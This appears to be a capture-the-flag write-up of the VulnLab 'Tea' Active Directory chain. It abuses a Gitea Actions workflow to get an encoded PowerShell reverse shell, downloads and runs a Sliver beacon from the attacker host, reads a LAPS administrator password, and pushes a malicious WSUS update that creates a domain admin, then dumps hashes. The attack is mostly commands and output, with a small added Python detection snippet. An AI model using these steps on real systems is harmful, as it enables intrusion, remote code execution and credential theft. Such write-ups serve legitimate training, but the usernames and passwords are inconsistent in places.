vulnlab-tea

A medium-rated AD chain. srv.tea.vl runs a Gitea instance with an active Actions runner; after registering a user and enabling Actions on a repository we own, a workflow run: step executes arbitrary commands and hands us a reverse shell as the runner account -> Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.

Gitea build

Create a .gitea/workflows/demo.yaml file in the repository we created.

http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml

name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e <base64 blob omitted>

Catch the callback with netcat:

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ rlwrap nc -nlvp 443                         
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061

PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami
tea\thomas.wallace
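The shell above lands as tea\thomas.wallace inside the act runner's hostexecutor working directory, so every run: step executes directly on srv.tea.vl as the runner's service account. As an added defensive example (not part of the original post), the Python below runs detection logic over constructed process-creation records shaped like that activity: a process started from the runner's .cache\act\<id>\hostexecutor directory, an encoded PowerShell command, and a download of an executable to disk; the field names, sample values and the encoded blob (a constructed "echo hi") are assumptions.

```python
import base64
import re

# Constructed process-creation records (not telemetry from the post), shaped like the
# fields a Security 4688 or Sysmon Event ID 1 record carries. The encoded blob is
# "echo hi" in UTF-16LE, built for this example.
SAMPLE_EVENTS = [
    {"user": "tea\\thomas.wallace",
     "parent": "C:\\act_runner\\act_runner.exe",
     "cwd": "C:\\Users\\thomas.wallace\\.cache\\act\\63805091085fb29f\\hostexecutor",
     "cmdline": "powershell -e ZQBjAGgAbwAgAGgAaQA="},
    {"user": "tea\\thomas.wallace",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cwd": "C:\\_install",
     "cmdline": "powershell iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe"},
    {"user": "tea\\svc_backup", "parent": "C:\\Windows\\explorer.exe",
     "cwd": "C:\\Users\\svc_backup", "cmdline": "powershell -NoProfile Get-Date"},
]

ENCODED_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
RUNNER_CWD_RE = re.compile(r"\\\.cache\\act\\[0-9a-f]+\\hostexecutor", re.I)  # act_runner per-job work dir
DOWNLOAD_RE = re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b.*\s-(?:o|outfile)\s+\S+\.exe\b", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event):
    """Return a list of (severity, reason) findings for one process-creation record."""
    findings = []
    from_runner = bool(RUNNER_CWD_RE.search(event["cwd"])) or event["parent"].lower().endswith("act_runner.exe")
    if from_runner:
        findings.append(("medium", "process spawned by Gitea act runner (workflow run: step)"))
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:  # encoded command from a CI runner is the page's exact pattern
        findings.append(("high" if from_runner else "medium", f"encoded PowerShell command: {decoded!r}"))
    if DOWNLOAD_RE.search(event["cmdline"]):
        findings.append(("medium", "PowerShell download of an executable to disk"))
    return findings

def triage(events):
    """Return {cmdline: findings} for every record that raised at least one finding."""
    return {e["cmdline"]: f for e in events if (f := analyze(e))}
```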

Download and execute the Sliver beacon:

PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> ./beacon.exe

Sliver

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ sliver                    
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain vigilance
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #1

   
sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 


sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols

[*] Generating new windows/amd64 beacon implant binary (5s)
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /tmp/beacon.exe

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST

sliver > use 9d553a10

[*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc)

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (2cdcbb9d)

[+] tea-3 completed task 2cdcbb9d

C:\_install (6 items, 24.0 MiB)
===============================
-rw-rw-rw-  beacon.exe                 10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi               1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx  626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  PsExec64.exe               813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe               523.4 KiB  Sun Dec 24 06:38:30 -0700 2023



sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon tea-3 (6338fcbb)

[+] tea-3 completed task 6338fcbb

[*] sharp-hound-4 output:
2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
--snip--
2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM
2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244
2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings.
 254 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.3130027413.log

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (3f00e892)

[+] tea-3 completed task 3f00e892

C:\_install (8 items, 24.0 MiB)
===============================
-rw-rw-rw-  20240820012840_BloodHound.zip                         23.2 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  beacon.exe                                            10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                                           10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi                                          1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx                             626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin  42.8 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  PsExec64.exe                                          813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe                                          523.4 KiB  Sun Dec 24 06:38:30 -0700 2023


sliver (tea-3) > download 20240820012840_BloodHound.zip

[*] Tasked beacon tea-3 (d8c023fe)

[+] tea-3 completed task d8c023fe

[*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip


sliver (tea-3) > interactive

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon tea-3 (d48d0ac7)

[*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST

sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14

[*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14)

sliver (tea-3) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 4600

PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText

Get-LAPSADPassword -Identity SRV -AsPlainText

ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : %t50Z))o4+0Z;6
PasswordUpdateTime  : 8/21/2024 11:53:03 PM
ExpirationTimestamp : 9/20/2024 11:53:03 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

PS C:\_install> 


netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local
WINRM       10.10.191.134   5985   SRV              [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl)
WINRM       10.10.191.134   5985   SRV              [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)

evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'

or

xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389

Not finished yet: this is only local admin on SRV. SRV also hosts the WSUS server (see the SQL enumeration output below), which is the path to the DC.

iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe

SharpWSUS

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
C:\WSUS-Updates\WsusContent
[*] Creating patch to use the following:
[*] Payload: psexec64.exe
[*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent

ImportUpdate
Update Revision ID: 198781
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 198782
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

There is no such global user or group: puck.

There is no such global user or group: " /title:Great.

There is no such global user or group: UpdateC21.

More help is available by typing NET HELPMSG 3783.



C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update
C:\WSUS-Updates\WsusContent

Targeting dc.tea.vl
TargetComputer, ComputerID, TargetID
------------------------------------
dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1
Group Exists = False
Group Created: Group1
Added Computer To Group
Approved Update

[*] Approve complete


C:\_install>

┌──(puck㉿kali)-[~/vulnlab]
└─$ netexec smb dc.tea.vl -u puckie -p 'Start123!'
SMB         10.10.145.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.145.21    445    DC               [+] tea.vl\puckie:Start123! (Pwn3d!)

Finally

xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389

Dump the hashes:

impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt

This was super fun.
